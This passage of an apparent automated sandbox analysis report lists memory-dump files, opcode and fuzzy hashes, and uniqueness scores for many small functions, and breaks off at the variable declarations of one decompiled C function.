                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                  • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                  • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                  • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00751148, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                  • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                  • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                  • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0075010C, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                  • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                  • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                  • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007501D4, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                  • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                  • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                  • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074F8CC, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                  • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                  • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                  • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00751930, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                  • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                  • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                  • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074F938, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                  • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                  • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                  • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FA50, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                  • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                  • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                  • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FA20, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                  • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                  • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                  • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FAB8, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                  • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                  • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                  • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FB50, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                  • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                  • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                  • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FBE8, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                  • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                  • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                  • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00750C40, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                  • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                  • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                  • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FC48, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                  • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                  • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                  • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FC30, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                  • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                  • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                  • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FD5C, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                  • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                  • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                  • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00751D80, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                  • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                  • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                  • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FE24, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                  • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                  • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                  • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FF34, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                  • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                  • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                  • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FFFC, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                  • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                  • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                  • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00778788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E00778788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
